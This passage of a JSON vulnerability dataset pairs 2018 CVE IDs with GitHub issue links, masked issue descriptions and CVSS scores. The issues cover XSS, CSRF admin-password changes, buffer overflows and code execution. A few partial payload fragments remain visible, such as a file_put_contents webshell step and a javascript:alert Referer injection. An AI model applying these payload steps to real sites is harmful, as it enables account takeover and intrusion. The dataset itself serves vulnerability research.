  25597. "exploitabilityScore": 1.6
  25598. },
  25599. {
  25600. "CVE_ID": "CVE-2018-17031",
  25601. "Issue_Url_old": "https://github.com/gogs/gogs/issues/5397",
  25602. "Issue_Url_new": "https://github.com/gogs/gogs/issues/5397",
  25603. "Repo_new": "gogs/gogs",
  25604. "Issue_Created_At": "2018-09-03T07:46:52Z",
  25605. "description": "Stored XSS vulnerability in viewing raw file.. Gogs version (or commit ref NUMBERTAG Can you reproduce the bug at FILETAG FILETAG Patch add x content type options:nosniff header to prevent browser from mime type sniffing , just as github / gitlab would do. Discoverer Wenxu Wu of Tencent's Xuanwu Lab",
  25606. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25607. "severity": "MEDIUM",
  25608. "baseScore": 6.1,
  25609. "impactScore": 2.7,
  25610. "exploitabilityScore": 2.8
  25611. },
  25612. {
  25613. "CVE_ID": "CVE-2018-17039",
  25614. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/24",
  25615. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/24",
  25616. "Repo_new": "bg5sbk/minicms",
  25617. "Issue_Created_At": "2018-09-04T04:39:38Z",
  25618. "description": "APITAG reflective XSS in PATHTAG This is a reflective XSS vulnerability because \"echo $_SERVER['REQUEST_URI'];\" in NUMBERTAG line FILETAG CODETAG php APITAG APITAG \");",
  25619. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25620. "severity": "MEDIUM",
  25621. "baseScore": 6.1,
  25622. "impactScore": 2.7,
  25623. "exploitabilityScore": 2.8
  25624. },
  25625. {
  25626. "CVE_ID": "CVE-2018-17042",
  25627. "Issue_Url_old": "https://github.com/bcsanches/dbf2txt/issues/2",
  25628. "Issue_Url_new": "https://github.com/bcsanches/dbf2txt/issues/2",
  25629. "Repo_new": "bcsanches/dbf2txt",
  25630. "Issue_Created_At": "2018-08-23T04:36:57Z",
  25631. "description": "Infinite Loop. I used Clang NUMBERTAG and APITAG to build dbf2txt URLTAG , in order to build it with clang in APITAG , the APITAG and APITAG should be motified like following: ERRORTAG This FILETAG can cause infinite loop when executing this command: APITAG",
  25632. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  25633. "severity": "MEDIUM",
  25634. "baseScore": 5.5,
  25635. "impactScore": 3.6,
  25636. "exploitabilityScore": 1.8
  25637. },
  25638. {
  25639. "CVE_ID": "CVE-2018-17043",
  25640. "Issue_Url_old": "https://github.com/tsfn/doc2txt/issues/1",
  25641. "Issue_Url_new": "https://github.com/tsfn/doc2txt/issues/1",
  25642. "Repo_new": "tsfn/doc2txt",
  25643. "Issue_Created_At": "2018-08-23T04:49:52Z",
  25644. "description": "Heap Buffer Overflow in Function Storage::init. I used g NUMBERTAG and APITAG to build doc2txt URLTAG , this FILETAG can cause heap buffer overflow in function Storage::init in Storage.cpp when executing this command(pic is just a folder which is used to store the picture in doc file): APITAG This is the ASAN information: ERRORTAG",
  25645. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25646. "severity": "HIGH",
  25647. "baseScore": 7.8,
  25648. "impactScore": 5.9,
  25649. "exploitabilityScore": 1.8
  25650. },
  25651. {
  25652. "CVE_ID": "CVE-2018-17045",
  25653. "Issue_Url_old": "https://github.com/maelosoki/MaeloStore/issues/1",
  25654. "Issue_Url_new": "https://github.com/maelosoki/maelostore/issues/1",
  25655. "Repo_new": "maelosoki/maelostore",
  25656. "Issue_Created_At": "2018-08-11T07:41:07Z",
  25657. "description": "Here is a CSRF vulnerability that can change administrator password.. APITAG is a CSRF vulnerability that can change administrator password via APITAG poc: APITAG change the administrator password CODETAG",
  25658. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25659. "severity": "HIGH",
  25660. "baseScore": 8.8,
  25661. "impactScore": 5.9,
  25662. "exploitabilityScore": 2.8
  25663. },
  25664. {
  25665. "CVE_ID": "CVE-2018-17046",
  25666. "Issue_Url_old": "https://github.com/magic-FE/translate-man/issues/49",
  25667. "Issue_Url_new": "https://github.com/magic-fe/translate-man/issues/49",
  25668. "Repo_new": "magic-fe/translate-man",
  25669. "Issue_Created_At": "2018-08-15T04:40:08Z",
  25670. "description": "Cross site scripting attack vulnerability. This plugin has the function of automatic translation after word segmentation. When XSS statements are entered, malicious code is executed. For example, \u54c8\u54c8\u54c8 \"> APITAG \" \u6b64\u65f6\u4f1a\u628a\u4e2d\u6587\u7ffb\u8bd1\u6210\u82f1\u6587\uff0c\u5e76\u4e14\u6267\u884cxss\u8bed\u53e5 This will translate Chinese into English and execute XSS statement. FILETAG FILETAG FILETAG",
  25671. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25672. "severity": "MEDIUM",
  25673. "baseScore": 6.1,
  25674. "impactScore": 2.7,
  25675. "exploitabilityScore": 2.8
  25676. },
  25677. {
  25678. "CVE_ID": "CVE-2018-17049",
  25679. "Issue_Url_old": "https://github.com/TREYWANGCQU/LANKERS/issues/1",
  25680. "Issue_Url_new": "https://github.com/treywangcqu/lankers/issues/1",
  25681. "Repo_new": "treywangcqu/lankers",
  25682. "Issue_Created_At": "2018-09-09T13:59:19Z",
  25683. "description": "there is a XSS vuln can bypass waf. Hello lankers! I find a reflective XSS can bypass waf in your product,the filter is not complete that such as long \"on\" function and the confirm fuction,I hope you can fix the problem! poc : URLTAG APITAG APITAG FILETAG FILETAG",
  25684. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25685. "severity": "MEDIUM",
  25686. "baseScore": 6.1,
  25687. "impactScore": 2.7,
  25688. "exploitabilityScore": 2.8
  25689. },
  25690. {
  25691. "CVE_ID": "CVE-2018-17051",
  25692. "Issue_Url_old": "https://github.com/adilinden/cisco-config-manager/issues/3",
  25693. "Issue_Url_new": "https://github.com/adilinden-oss/cisco-config-manager/issues/3",
  25694. "Repo_new": "adilinden-oss/cisco-config-manager",
  25695. "Issue_Created_At": "2018-09-14T02:44:53Z",
  25696. "description": "Hello, safety Cross site scripting attack vulnerability. Hello, safety Cross site scripting attack APITAG details are as follows NUMBERTAG FILETAG [id parameter] Request GET /cisco APITAG HTTP NUMBERTAG Host: APITAG Accept Encoding: gzip, deflate Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close Response HTTP NUMBERTAG OK Date: Thu NUMBERTAG Sep NUMBERTAG GMT Server: APITAG APITAG APITAG APITAG X Powered By: APITAG Content Length NUMBERTAG Connection: close Content Type: text/html APITAG APITAG APITAG APITAG APITAG Devices &gt; Edit Device APITAG APITAG alert NUMBERTAG APITAG fe NUMBERTAG z\"> ...[SNIP NUMBERTAG FILETAG [id parameter] Request GET /cisco APITAG HTTP NUMBERTAG Host: APITAG Accept Encoding: gzip, deflate Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close Response HTTP NUMBERTAG OK Date: Thu NUMBERTAG Sep NUMBERTAG GMT Server: APITAG APITAG APITAG APITAG X Powered By: APITAG Content Length NUMBERTAG Connection: close Content Type: text/html APITAG APITAG APITAG APITAG APITAG Devices &gt; Edit Device APITAG APITAG alert NUMBERTAG APITAG aw0wt\"> ...[SNIP NUMBERTAG FILETAG [name of an arbitrarily supplied URL parameter] Request GET PATHTAG NUMBERTAG APITAG h0gz5 HTTP NUMBERTAG Host: APITAG Accept Encoding: gzip, deflate Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close Referer: URLTAG Response HTTP NUMBERTAG OK Date: Thu NUMBERTAG Sep NUMBERTAG GMT Server: APITAG APITAG APITAG APITAG X Powered By: APITAG Content Length NUMBERTAG Connection: close Content Type: text/html APITAG APITAG APITAG APITAG APITAG Devices &gt; List Devices APITAG APITAG alert NUMBERTAG APITAG h0gz5?action=add\"> ...[SNIP NUMBERTAG parameters are listed here, and there are also loopholes in other parameters directly displayed.",
  25697. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25698. "severity": "MEDIUM",
  25699. "baseScore": 6.1,
  25700. "impactScore": 2.7,
  25701. "exploitabilityScore": 2.8
  25702. },
  25703. {
  25704. "CVE_ID": "CVE-2018-17069",
  25705. "Issue_Url_old": "https://github.com/unlcms/UNL-CMS/issues/941",
  25706. "Issue_Url_new": "https://github.com/unlcms/unl-cms/issues/941",
  25707. "Repo_new": "unlcms/unl-cms",
  25708. "Issue_Created_At": "2018-08-04T08:30:31Z",
  25709. "description": "There are two CSRF vulnerabilities that can create new content or update the website settings. APITAG is a CSRF vulnerabilitie that can create new content via APITAG poc: APITAG create a new content ERRORTAG APITAG is a CSRF vulnerabilitie that can update the website settings via APITAG APITAG poc: APITAG update the website settings ERRORTAG",
  25710. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  25711. "severity": "MEDIUM",
  25712. "baseScore": 6.5,
  25713. "impactScore": 3.6,
  25714. "exploitabilityScore": 2.8
  25715. },
  25716. {
  25717. "CVE_ID": "CVE-2018-17072",
  25718. "Issue_Url_old": "https://github.com/tunnuz/json/issues/11",
  25719. "Issue_Url_new": "https://github.com/tunnuz/json/issues/11",
  25720. "Repo_new": "tunnuz/json",
  25721. "Issue_Created_At": "2018-08-13T06:13:31Z",
  25722. "description": "buffer overflow while testing. I run test.cc and get the following message... Should I write something like \"delete A\" at somewhere NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG c0 at pc NUMBERTAG d NUMBERTAG bp NUMBERTAG ffe NUMBERTAG b NUMBERTAG f0 sp NUMBERTAG ffe NUMBERTAG b NUMBERTAG e8 READ of size NUMBERTAG at NUMBERTAG c0 thread T NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG efb3 in parse_file(char const ) PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG db NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG e NUMBERTAG in _start ( PATHTAG NUMBERTAG c4 is located NUMBERTAG bytes to the right of global variable 'yyleng' defined in PATHTAG NUMBERTAG c0) of size NUMBERTAG SUMMARY: APITAG global buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG ac NUMBERTAG f9 f9 f NUMBERTAG ad0: f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG ae NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG af0: f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f9 Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  25723. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  25724. "severity": "CRITICAL",
  25725. "baseScore": 9.8,
  25726. "impactScore": 5.9,
  25727. "exploitabilityScore": 3.9
  25728. },
  25729. {
  25730. "CVE_ID": "CVE-2018-17073",
  25731. "Issue_Url_old": "https://github.com/wernsey/bitmap/issues/1",
  25732. "Issue_Url_new": "https://github.com/wernsey/bitmap/issues/1",
  25733. "Repo_new": "wernsey/bitmap",
  25734. "Issue_Created_At": "2018-08-14T07:13:38Z",
  25735. "description": "SEGV on unknown access while get a bmp's width. System: Ubuntu NUMBERTAG Compile use: clang++ with asan, libpng, libjpeg Here's my program: ERRORTAG and here is my bmp: FILETAG APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG bp NUMBERTAG df0 sp NUMBERTAG ffc6aced1f0 T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG in bm_width PATHTAG NUMBERTAG f7e in main PATHTAG NUMBERTAG fd NUMBERTAG af7fb NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in bm_width NUMBERTAG ABORTING",
  25736. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  25737. "severity": "HIGH",
  25738. "baseScore": 7.5,
  25739. "impactScore": 3.6,
  25740. "exploitabilityScore": 3.9
  25741. },
  25742. {
  25743. "CVE_ID": "CVE-2018-17075",
  25744. "Issue_Url_old": "https://github.com/golang/go/issues/27016",
  25745. "Issue_Url_new": "https://github.com/golang/go/issues/27016",
  25746. "Repo_new": "golang/go",
  25747. "Issue_Created_At": "2018-08-16T03:11:50Z",
  25748. "description": "PATHTAG APITAG panic caused by malformed data. What did you do? CODETAG What did you expect to see? No panic exit What did you see instead? ERRORTAG Analysis There are many reasons for panic, but the main reason is: APITAG does not handle some special APITAG meanwhile ERRORTAG does handle these special APITAG thus causing panic. Other test cases that cause the same problem: APITAG System details CODETAG",
  25749. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  25750. "severity": "HIGH",
  25751. "baseScore": 7.5,
  25752. "impactScore": 3.6,
  25753. "exploitabilityScore": 3.9
  25754. },
  25755. {
  25756. "CVE_ID": "CVE-2018-17076",
  25757. "Issue_Url_old": "https://github.com/logological/gpp/issues/26",
  25758. "Issue_Url_new": "https://github.com/logological/gpp/issues/26",
  25759. "Repo_new": "logological/gpp",
  25760. "Issue_Created_At": "2018-09-14T02:04:09Z",
  25761. "description": "gpp: Segmentation fault. When using the file below, GPP will try to use more memory space than is available on the stack. FILETAG This can lead to denial of service attacks, even remote code execution in specific situations",
  25762. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25763. "severity": "HIGH",
  25764. "baseScore": 8.8,
  25765. "impactScore": 5.9,
  25766. "exploitabilityScore": 2.8
  25767. },
  25768. {
  25769. "CVE_ID": "CVE-2018-17077",
  25770. "Issue_Url_old": "https://github.com/wacj1425/yiqicms/issues/1",
  25771. "Issue_Url_new": "https://github.com/wacj1425/yiqicms/issues/1",
  25772. "Repo_new": "wacj1425/yiqicms",
  25773. "Issue_Created_At": "2018-08-25T16:56:01Z",
  25774. "description": "There is a storage xss vulnerability in comment title. FILETAG code show as below. Only length restrictions are applied to the $msgtitle. So caused a loophole. We can use / / to bypass the length limit. For example, the first comment title input \" APITAG alert NUMBERTAG and second input NUMBERTAG APITAG \". View comments in the background to trigger the vulnerability. CODETAG",
  25775. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25776. "severity": "MEDIUM",
  25777. "baseScore": 6.1,
  25778. "impactScore": 2.7,
  25779. "exploitabilityScore": 2.8
  25780. },
  25781. {
  25782. "CVE_ID": "CVE-2018-17079",
  25783. "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/38",
  25784. "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/38",
  25785. "Repo_new": "94fzb/zrlog",
  25786. "Issue_Created_At": "2018-09-18T15:55:09Z",
  25787. "description": "There is a stored XSS in the article review area. Comment area does not do input filtering Poc ERRORTAG",
  25788. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25789. "severity": "MEDIUM",
  25790. "baseScore": 6.1,
  25791. "impactScore": 2.7,
  25792. "exploitabilityScore": 2.8
  25793. },
  25794. {
  25795. "CVE_ID": "CVE-2018-17095",
  25796. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/51",
  25797. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/51",
  25798. "Repo_new": "mpruett/audiofile",
  25799. "Issue_Created_At": "2018-07-26T10:56:49Z",
  25800. "description": "A heap buffer overflow has occurred when running sfconvert. A heap buffer overflow has occurred when running sfconvert ERRORTAG And the input file has been put at: URLTAG",
  25801. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25802. "severity": "HIGH",
  25803. "baseScore": 8.8,
  25804. "impactScore": 5.9,
  25805. "exploitabilityScore": 2.8
  25806. },
  25807. {
  25808. "CVE_ID": "CVE-2018-17095",
  25809. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/50",
  25810. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/50",
  25811. "Repo_new": "mpruett/audiofile",
  25812. "Issue_Created_At": "2018-07-26T10:48:55Z",
  25813. "description": "A heap buffer overflow has occurred when running sfconvert. A heap buffer overflow has occurred when running sfconvert. ERRORTAG And the input file has been put at: URLTAG",
  25814. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25815. "severity": "HIGH",
  25816. "baseScore": 8.8,
  25817. "impactScore": 5.9,
  25818. "exploitabilityScore": 2.8
  25819. },
  25820. {
  25821. "CVE_ID": "CVE-2018-17102",
  25822. "Issue_Url_old": "https://github.com/quickapps/cms/issues/199",
  25823. "Issue_Url_new": "https://github.com/quickapps/cms/issues/199",
  25824. "Repo_new": "quickapps/cms",
  25825. "Issue_Created_At": "2018-08-10T11:57:05Z",
  25826. "description": "CSRF issue that allows attacker to change the administrator password. There is a CSRF vulnerability has been found in the quickappscms,which can change administrator's password. After the administrator login in ,open this html page: POC: APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  25827. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25828. "severity": "HIGH",
  25829. "baseScore": 8.8,
  25830. "impactScore": 5.9,
  25831. "exploitabilityScore": 2.8
  25832. },
  25833. {
  25834. "CVE_ID": "CVE-2018-17102",
  25835. "Issue_Url_old": "https://github.com/quickapps/cms/issues/187",
  25836. "Issue_Url_new": "https://github.com/quickapps/cms/issues/187",
  25837. "Repo_new": "quickapps/cms",
  25838. "Issue_Created_At": "2018-03-27T05:55:25Z",
  25839. "description": "CSRF issue that allows attacker to create an account. Hello. I'd like to report a security issue on the admin page. Summary this vuln is CSRF vuln that allows creating any kinds of account. When an attacker induce authorized victims to a malicious webpage and make them send requests. a victim creates an account without their intent. Reproduce This is a step how to reproduce NUMBERTAG Access to the html page has payload content after you login to admin( PATHTAG ) page. Then you find an admin account named [test] is created. Payloads CODETAG I think this security issue is not serious. Because attack using this vulnerability requires induction. Event NUMBERTAG this vulnerability is discovered NUMBERTAG Open an issue on Github.",
  25840. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25841. "severity": "HIGH",
  25842. "baseScore": 8.8,
  25843. "impactScore": 5.9,
  25844. "exploitabilityScore": 2.8
  25845. },
  25846. {
  25847. "CVE_ID": "CVE-2018-17103",
  25848. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1295",
  25849. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1295",
  25850. "Repo_new": "getsimplecms/getsimplecms",
  25851. "Issue_Created_At": "2018-08-24T06:49:03Z",
  25852. "description": "APITAG NUMBERTAG allows CSRF to change the administrator account's password. in FILETAG . APITAG NUMBERTAG allows CSRF to change the administrator account's pssword. After the administrator login in,open the poc,the administrator account's password will been changed to NUMBERTAG POC: CODETAG",
  25853. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25854. "severity": "HIGH",
  25855. "baseScore": 8.8,
  25856. "impactScore": 5.9,
  25857. "exploitabilityScore": 2.8
  25858. },
  25859. {
  25860. "CVE_ID": "CVE-2018-17104",
  25861. "Issue_Url_old": "https://github.com/microweber/microweber/issues/484",
  25862. "Issue_Url_new": "https://github.com/microweber/microweber/issues/484",
  25863. "Repo_new": "microweber/microweber",
  25864. "Issue_Created_At": "2018-08-31T12:33:55Z",
  25865. "description": "There is a CSRF vulnerability that can add the administrator account . After the administrator logged in, open the following page to add an administrator. POC: APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  25866. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25867. "severity": "HIGH",
  25868. "baseScore": 8.8,
  25869. "impactScore": 5.9,
  25870. "exploitabilityScore": 2.8
  25871. },
  25872. {
  25873. "CVE_ID": "CVE-2018-17104",
  25874. "Issue_Url_old": "https://github.com/microweber/microweber/issues/483",
  25875. "Issue_Url_new": "https://github.com/microweber/microweber/issues/483",
  25876. "Repo_new": "microweber/microweber",
  25877. "Issue_Created_At": "2018-08-31T01:19:15Z",
  25878. "description": "There is a CSRF vulnerability that can add the administrator account . After the administrator logged in, open the following page to add an administrator. POC: CODETAG",
  25879. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25880. "severity": "HIGH",
  25881. "baseScore": 8.8,
  25882. "impactScore": 5.9,
  25883. "exploitabilityScore": 2.8
  25884. },
  25885. {
  25886. "CVE_ID": "CVE-2018-17106",
  25887. "Issue_Url_old": "https://github.com/vbirds/Tinyftp/issues/4",
  25888. "Issue_Url_new": "https://github.com/vbirds/tinyftp/issues/4",
  25889. "Repo_new": "vbirds/tinyftp",
  25890. "Issue_Created_At": "2018-08-10T06:45:12Z",
  25891. "description": "Remote Buffer Overflow problem. Hey, sir. Buffer overflow exists in the text variable of the do_mkd function in the ftpproto.c APITAG ebp when new folder and absolute path name length exceeds NUMBERTAG char text NUMBERTAG it just NUMBERTAG byte char dir NUMBERTAG getcwd(dir, sizeof(dir)); sprintf(text, \" %s%s created\", dir, sess >arg);//it more then NUMBERTAG",
  25892. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  25893. "severity": "HIGH",
  25894. "baseScore": 7.5,
  25895. "impactScore": 3.6,
  25896. "exploitabilityScore": 3.9
  25897. },
  25898. {
  25899. "CVE_ID": "CVE-2018-17107",
  25900. "Issue_Url_old": "https://github.com/tgstation/tgstation-server/issues/690",
  25901. "Issue_Url_new": "https://github.com/tgstation/tgstation-server/issues/690",
  25902. "Repo_new": "tgstation/tgstation-server",
  25903. "Issue_Created_At": "2018-09-20T19:12:04Z",
  25904. "description": "You can login to the server with any username/password combination if someone else is logged in. An explanation of the bug: Back in NUMBERTAG in order to accommodate running the Control Panel using Mono some hooks were added to the WCF communication layer. Detailed in this commit: URLTAG The bug was in this line: URLTAG APITAG is passed in by the framework but the documentation for what the parameter is is virtually non existent: URLTAG Turns out it is a cache of what the previously returned policy was, as Floyd thankfully found out for us. The security patch fixes the issue by creating a new empty list as the return value when password authentication fails as opposed to using the APITAG parameter. If you're wondering why this line: URLTAG didn't prevent the issue. It only invalidated the actual Windows login session, but in the eyes of the server the user was still valid since we just passed that closed handle as a return result. Had access to static files been attempted with a bad login, the request would end up erroring due to trying to impersonate using a closed user token handle. CVETAG This has been fixed in APITAG and versions NUMBERTAG",
  25905. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  25906. "severity": "CRITICAL",
  25907. "baseScore": 9.8,
  25908. "impactScore": 5.9,
  25909. "exploitabilityScore": 3.9
  25910. },
  25911. {
  25912. "CVE_ID": "CVE-2018-17113",
  25913. "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/7",
  25914. "Issue_Url_new": "https://github.com/teameasy/easycms/issues/7",
  25915. "Repo_new": "teameasy/easycms",
  25916. "Issue_Created_At": "2018-09-14T04:08:20Z",
  25917. "description": "there is a xss vuln in your product. Hi\uff0cteameasy\uff01 When I use your cms,I found a xss vuln in your APITAG flash version is the key of the problem,i hope you can fix it soon. thx FILETAG",
  25918. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25919. "severity": "MEDIUM",
  25920. "baseScore": 6.1,
  25921. "impactScore": 2.7,
  25922. "exploitabilityScore": 2.8
  25923. },
  25924. {
  25925. "CVE_ID": "CVE-2018-17129",
  25926. "Issue_Url_old": "https://github.com/panghusec/exploit/issues/2",
  25927. "Issue_Url_new": "https://github.com/panghusec/exploit/issues/2",
  25928. "Repo_new": "panghusec/exploit",
  25929. "Issue_Created_At": "2018-08-15T06:27:44Z",
  25930. "description": "metinfo NUMBERTAG FILETAG APITAG Vulnerability . POC: APITAG download the metinfo the Latest version from URLTAG url FILETAG APITAG install it and login as admin APITAG request URLTAG url FILETAG",
  25931. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  25932. "severity": "MEDIUM",
  25933. "baseScore": 4.9,
  25934. "impactScore": 3.6,
  25935. "exploitabilityScore": 1.2
  25936. },
  25937. {
  25938. "CVE_ID": "CVE-2018-17130",
  25939. "Issue_Url_old": "https://github.com/panghusec/exploit/issues/3",
  25940. "Issue_Url_new": "https://github.com/panghusec/exploit/issues/3",
  25941. "Repo_new": "panghusec/exploit",
  25942. "Issue_Created_At": "2018-08-15T08:02:20Z",
  25943. "description": "phpmywind NUMBERTAG Persistent(stored) XSS. Attackers can get admin's Cookie and do otherthing APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it NUMBERTAG register an ordinary user and find an article to comment FILETAG NUMBERTAG find an article to comment such as URLTAG FILETAG NUMBERTAG use burpsuite and modify Referer,such as APITAG javascript:alert(/panghu from APITAG FILETAG APITAG as Admin and request FILETAG to review user's comments and click the comment that include xss payload",
  25944. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  25945. "severity": "MEDIUM",
  25946. "baseScore": 5.4,
  25947. "impactScore": 2.7,
  25948. "exploitabilityScore": 2.3
  25949. },
  25950. {
  25951. "CVE_ID": "CVE-2018-17131",
  25952. "Issue_Url_old": "https://github.com/panghusec/exploit/issues/5",
  25953. "Issue_Url_new": "https://github.com/panghusec/exploit/issues/5",
  25954. "Repo_new": "panghusec/exploit",
  25955. "Issue_Created_At": "2018-08-15T09:32:16Z",
  25956. "description": "phpmywind NUMBERTAG Code Execution2. Attackers can get webshell or code execution APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it NUMBERTAG login as Admin NUMBERTAG request FILETAG FILETAG (select number!!!!!) payload NUMBERTAG file_put_contents(\"../ FILETAG \",\"just a test\"); FILETAG NUMBERTAG then the payload is written in the FILETAG FILETAG then in root directory panghusec.txt will be created: ) In summary: from FILETAG Insert data into database and in lines NUMBERTAG enter APITAG function and code execution :)",
  25957. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  25958. "severity": "HIGH",
  25959. "baseScore": 7.2,
  25960. "impactScore": 5.9,
  25961. "exploitabilityScore": 1.2
  25962. },
  25963. {
  25964. "CVE_ID": "CVE-2018-17132",
  25965. "Issue_Url_old": "https://github.com/panghusec/exploit/issues/4",
  25966. "Issue_Url_new": "https://github.com/panghusec/exploit/issues/4",
  25967. "Repo_new": "panghusec/exploit",
  25968. "Issue_Created_At": "2018-08-15T08:52:24Z",
  25969. "description": "phpmywind NUMBERTAG Code Execution1. Attackers can get webshell or code execution APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it NUMBERTAG login as Admin NUMBERTAG request URLTAG FILETAG",
  25970. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  25971. "severity": "HIGH",
  25972. "baseScore": 7.2,
  25973. "impactScore": 5.9,
  25974. "exploitabilityScore": 1.2
  25975. },
  25976. {
  25977. "CVE_ID": "CVE-2018-17133",
  25978. "Issue_Url_old": "https://github.com/panghusec/exploit/issues/6",
  25979. "Issue_Url_new": "https://github.com/panghusec/exploit/issues/6",
  25980. "Repo_new": "panghusec/exploit",
  25981. "Issue_Created_At": "2018-08-15T10:06:27Z",
